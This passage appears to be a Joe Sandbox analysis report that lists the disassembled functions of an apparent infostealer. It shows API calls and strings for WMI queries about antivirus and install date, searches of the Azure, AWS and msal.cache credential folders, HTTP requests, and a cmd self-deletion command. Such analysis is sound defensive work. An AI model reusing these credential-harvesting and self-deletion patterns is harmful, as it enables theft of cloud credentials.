CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00D634DC
VariantInit.OLEAUT32(?), ref: 00D63537

Part of subcall function 00D633B3: __EH_prolog3_catch.LIBCMT ref: 00D633BA
Part of subcall function 00D633B3: CoCreateInstance.OLE32(00D84220,00000000,00000001,00D8C180,?,00000018,00D6355D,?), ref: 00D633DD
Part of subcall function 00D633B3: SysAllocString.OLEAUT32(?), ref: 00D633EA
Part of subcall function 00D633B3: _wtoi64.MSVCRT ref: 00D6341D
Part of subcall function 00D633B3: SysFreeString.OLEAUT32(?), ref: 00D63436
Part of subcall function 00D633B3: SysFreeString.OLEAUT32(00000000), ref: 00D6343D

FileTimeToSystemTime.KERNEL32(?,?), ref: 00D63566
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D63572
HeapAlloc.KERNEL32(00000000), ref: 00D63579
VariantClear.OLEAUT32(?), ref: 00D635B8
wsprintfA.USER32 ref: 00D635A5

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Strings

ROOT\CIMV2, xrefs: 00D634BE
%d/%d/%d %d:%d:%d, xrefs: 00D6359F
Unknown, xrefs: 00D635C6
Unknown, xrefs: 00D635E1
WQL, xrefs: 00D634F6
Select * From Win32_OperatingSystem, xrefs: 00D634F1
InstallDate, xrefs: 00D63549
Unknown, xrefs: 00D635CD

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
API String ID: 2280294774-461178377
Opcode ID: 752e7cf357227282d14544f657a412476c426dfb6715f44a757a7f303643a184
Instruction ID: 4a35c581b3dd0948a4b5694b09ce0474e62b0bdde9524293efe6d6ed114b143e
Opcode Fuzzy Hash: 752e7cf357227282d14544f657a412476c426dfb6715f44a757a7f303643a184
Instruction Fuzzy Hash: E3411A71904209BFDB21ABD5DC89EEFBBBDEF89B11F10410AF611E6290D6749A45CB30

Function 00D6820C Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00D68231

Part of subcall function 00D63A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00D63A59

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00D68250
lstrcatA.KERNEL32(?,\.azure\), ref: 00D6826D

Part of subcall function 00D67D20: wsprintfA.USER32 ref: 00D67D67
Part of subcall function 00D67D20: FindFirstFileA.KERNEL32(?,?), ref: 00D67D7E
Part of subcall function 00D67D20: StrCmpCA.SHLWAPI(?,00D87AF4), ref: 00D67D9F
Part of subcall function 00D67D20: StrCmpCA.SHLWAPI(?,00D87AF8), ref: 00D67DB9
Part of subcall function 00D67D20: wsprintfA.USER32 ref: 00D67DE0
Part of subcall function 00D67D20: StrCmpCA.SHLWAPI(?,00D876B6), ref: 00D67DF4
Part of subcall function 00D67D20: wsprintfA.USER32 ref: 00D67E11
Part of subcall function 00D67D20: PathMatchSpecA.SHLWAPI(?,?), ref: 00D67E3E
Part of subcall function 00D67D20: lstrcatA.KERNEL32(?), ref: 00D67E74
Part of subcall function 00D67D20: lstrcatA.KERNEL32(?,00D87B10), ref: 00D67E86
Part of subcall function 00D67D20: lstrcatA.KERNEL32(?,?), ref: 00D67E99
Part of subcall function 00D67D20: lstrcatA.KERNEL32(?,00D87B14), ref: 00D67EAB
Part of subcall function 00D67D20: lstrcatA.KERNEL32(?,?), ref: 00D67EBF

_memset.LIBCMT ref: 00D682A5
lstrcatA.KERNEL32(?,00000000), ref: 00D682C7
lstrcatA.KERNEL32(?,\.aws\), ref: 00D682E4

Part of subcall function 00D67D20: wsprintfA.USER32 ref: 00D67E28
Part of subcall function 00D67D20: CopyFileA.KERNEL32(?,?,00000001), ref: 00D67F78
Part of subcall function 00D67D20: DeleteFileA.KERNEL32(?), ref: 00D67FEC
Part of subcall function 00D67D20: FindNextFileA.KERNEL32(?,?), ref: 00D6804E
Part of subcall function 00D67D20: FindClose.KERNEL32(?), ref: 00D68062

_memset.LIBCMT ref: 00D68319
lstrcatA.KERNEL32(?,00000000), ref: 00D6833B
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00D68358
_memset.LIBCMT ref: 00D6838D

Strings

Azure\.IdentityService, xrefs: 00D68368
\.azure\, xrefs: 00D68261
*.*, xrefs: 00D682F9
Azure\.aws, xrefs: 00D682F4
\.aws\, xrefs: 00D682D8
*.*, xrefs: 00D68285
\.IdentityService\, xrefs: 00D6834C
msal.cache, xrefs: 00D6836D
Azure\.azure, xrefs: 00D68280

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 780282842-974132213
Opcode ID: c5178e54ca90760adeebe70115971d9ba4caffb4db0df178592ace99bed8bc79
Instruction ID: efdff55c129584290c9ec449a8dd8ab80075dc6948ac762c7a11bdc6e9b8ecc2
Opcode Fuzzy Hash: c5178e54ca90760adeebe70115971d9ba4caffb4db0df178592ace99bed8bc79
Instruction Fuzzy Hash: 0E415171D8021CABDB14FB60EC47FED737CEB05704F540895BA14A6191EAB0AA8C8B71

Function 00D652CC Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 278
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strtok_s.MSVCRT ref: 00D65317
StrCmpCA.SHLWAPI(?,true), ref: 00D653D9

Part of subcall function 00D621A5: lstrlenA.KERNEL32(?,?,00D69098,00D877FE,00D87787,?,?,?,?,00D69D6E), ref: 00D621AB
Part of subcall function 00D621A5: lstrcpyA.KERNEL32(00000000,00000000,?,00D69098,00D877FE,00D87787,?,?,?,?,00D69D6E), ref: 00D621DD

lstrcpyA.KERNEL32(?,?), ref: 00D6549B
lstrcpyA.KERNEL32(?,00000000), ref: 00D654CB
lstrcpyA.KERNEL32(?,00000000), ref: 00D65506
lstrcpyA.KERNEL32(?,00000000), ref: 00D65541
lstrcpyA.KERNEL32(?,00000000), ref: 00D6557C
lstrcpyA.KERNEL32(?,00000000), ref: 00D655B7
strtok_s.MSVCRT ref: 00D656CB

Strings

true, xrefs: 00D653D3
false, xrefs: 00D653F2

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$lstrlen
String ID: false$true
API String ID: 2116072422-2658103896
Opcode ID: 28c44abaaa3d3f40f537f5b5fe86f426120ebc3a13abd53f901fee7a1a50aaa9
Instruction ID: 80ff91414d0be8557cd8ff9bee8c500cee532a4abce3a6b4fc9c54af8302905a
Opcode Fuzzy Hash: 28c44abaaa3d3f40f537f5b5fe86f426120ebc3a13abd53f901fee7a1a50aaa9
Instruction Fuzzy Hash: B7B1477594022CAFDB64EF54EC89AD973B8FB18300F1001E6E949A7261DB71AEC5CF60

Function 00D5515F Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 161
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D62175: lstrcpyA.KERNEL32(00000000,?,?,00D51CF7,?,00D69260), ref: 00D62194

Part of subcall function 00D549DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A10
Part of subcall function 00D549DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A16
Part of subcall function 00D549DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A1C
Part of subcall function 00D549DE: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00D54A2E
Part of subcall function 00D549DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00D54A36

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D551A6
RtlAllocateHeap.NTDLL(00000000), ref: 00D551AD
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 00D551CF
StrCmpCA.SHLWAPI(?), ref: 00D551E9
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D55219
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00D55258
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00D55288
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D55293
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00D552BC
InternetReadFile.WININET(?,?,00000400,?), ref: 00D55302
InternetCloseHandle.WININET(?), ref: 00D55361
InternetCloseHandle.WININET(?), ref: 00D5536D
InternetCloseHandle.WININET(?), ref: 00D55379

Strings

GET, xrefs: 00D5524D

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET
API String ID: 442264750-1805413626
Opcode ID: f803dce1e1b38b00318b80eb2c1b7029f6d6b54d67a581e603f0d30fa08d6e51
Instruction ID: ffecb387b9d67c16aa63ff1c36305a06ac0cbd3bd1125f12a2790ddac9a78325
Opcode Fuzzy Hash: f803dce1e1b38b00318b80eb2c1b7029f6d6b54d67a581e603f0d30fa08d6e51
Instruction Fuzzy Hash: 16510D7190092CAFEF219F64DC85BEF7BB8FB09346F0440A5F909A2150D6715F949FA0

Function 00D635F3 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00D635FA
CoInitializeEx.OLE32(00000000,00000000,00000030,00D65CA4,?,AV: ,00D87904,Install Date: ,00D878F0,00000000,Windows: ,00D878E0,Work Dir: In memory,00D878C8), ref: 00D63609
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00D6361A
CoCreateInstance.OLE32(00D83F70,00000000,00000001,00D83EA0,?), ref: 00D63634
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00D6366A
VariantInit.OLEAUT32(?), ref: 00D636B9

Part of subcall function 00D6399E: LocalAlloc.KERNEL32(00000040,00000005,?,?,00D636DC,?), ref: 00D639A6
Part of subcall function 00D6399E: CharToOemW.USER32(?,00000000), ref: 00D639B2

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

VariantClear.OLEAUT32(?), ref: 00D636E7

Strings

Select * From AntiVirusProduct, xrefs: 00D6367F
Unknown, xrefs: 00D636FC
displayName, xrefs: 00D636CB
Unknown, xrefs: 00D636F5
root\SecurityCenter2, xrefs: 00D6364C
WQL, xrefs: 00D63684
Unknown, xrefs: 00D63710

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 4288110179-315474579
Opcode ID: 4f829e72ee6571c7bbc620bb34e3a0fad59102f04d00481cdf5b6746f0c59502
Instruction ID: 84f7570252a5a67972a5bbbbdd671f17781904e2d635166ad4904e0c69da9452
Opcode Fuzzy Hash: 4f829e72ee6571c7bbc620bb34e3a0fad59102f04d00481cdf5b6746f0c59502
Instruction Fuzzy Hash: 96311BB1A04345BFDB10AB96DC4AEAFBB7DEFC5B10F244109F211A6291C6749A05CB30

Function 00D51274 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D51297
_memset.LIBCMT ref: 00D512A6
lstrcatA.KERNEL32(?,00D8BC0C), ref: 00D512C0
lstrcatA.KERNEL32(?,00D8BC10), ref: 00D512CE
lstrcatA.KERNEL32(?,00D8BC14), ref: 00D512DC
lstrcatA.KERNEL32(?,00D8BC18), ref: 00D512EA
lstrcatA.KERNEL32(?,00D8BC1C), ref: 00D512F8
lstrcatA.KERNEL32(?,00D8BC20), ref: 00D51306
lstrcatA.KERNEL32(?,00D8BC24), ref: 00D51314
lstrcatA.KERNEL32(?,00D8BC28), ref: 00D51322
lstrcatA.KERNEL32(?,00D8BC2C), ref: 00D51330
lstrcatA.KERNEL32(?,00D8BC30), ref: 00D5133E
lstrcatA.KERNEL32(?,00D8BC34), ref: 00D5134C
lstrcatA.KERNEL32(?,00D8BC38), ref: 00D5135A
lstrcatA.KERNEL32(?,00D8BC3C), ref: 00D51368

Part of subcall function 00D628E1: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D51375), ref: 00D628ED
Part of subcall function 00D628E1: HeapAlloc.KERNEL32(00000000,?,?,?,00D51375), ref: 00D628F4
Part of subcall function 00D628E1: GetComputerNameA.KERNEL32(00000000,00D51375), ref: 00D62908

ExitProcess.KERNEL32 ref: 00D513D3

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
String ID:
API String ID: 1553874529-0
Opcode ID: 1b4bec8373b6040380d7b421f33df06bb1aa2c7608f250d869fed3b343aad0d5
Instruction ID: 37cd25e2c9606682c05c8e3c33ff6e1e99c5d4e2f759b6a805fafec36cab24c5
Opcode Fuzzy Hash: 1b4bec8373b6040380d7b421f33df06bb1aa2c7608f250d869fed3b343aad0d5
Instruction Fuzzy Hash: 1D416775D0422C6BDF20EB718C59FDB7BAC9F15760F540592AD98E3141EB709A8C8BB0

Function 00D62E5F Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 155registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,00D87816,00000000,?,?), ref: 00D62ECF
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00D62F0C
wsprintfA.USER32 ref: 00D62F39
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00D62F58
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00D62F8E
lstrlenA.KERNEL32(?), ref: 00D62FA3

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00D87E28), ref: 00D63038
RegCloseKey.ADVAPI32(?), ref: 00D630A2
RegCloseKey.ADVAPI32(?), ref: 00D630C2
RegCloseKey.ADVAPI32(?), ref: 00D630CE

Strings

?, xrefs: 00D62EBF
%s\%s, xrefs: 00D62F33
- , xrefs: 00D63042

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
String ID: - $%s\%s$?
API String ID: 2394436309-3278919252
Opcode ID: 4503af1db6274c54f2cc479256554b03a8bc05559823df547b45a9da978012d3
Instruction ID: 4c74122737ccf89304bcf67b6d80ae36fbe9beae8f07dc1fa45841e5fb001a10
Opcode Fuzzy Hash: 4503af1db6274c54f2cc479256554b03a8bc05559823df547b45a9da978012d3
Instruction Fuzzy Hash: 2861BB7590012CABEF21DF55DD85EDAB7B8EB45300F1046D6AA08A2121DF315FC9DF60

Function 00D69A4C Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D69A71
_memset.LIBCMT ref: 00D69A80
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 00D69A95

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

ShellExecuteEx.SHELL32(?), ref: 00D69C35
_memset.LIBCMT ref: 00D69C44
_memset.LIBCMT ref: 00D69C56
ExitProcess.KERNEL32 ref: 00D69C66

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Strings

" & exit, xrefs: 00D69B64
" & rd /s /q "C:\ProgramData\, xrefs: 00D69B0E
/c timeout /t 10 & del /f /q ", xrefs: 00D69AC0
/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00D69B6B
" & exit, xrefs: 00D69BB5

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
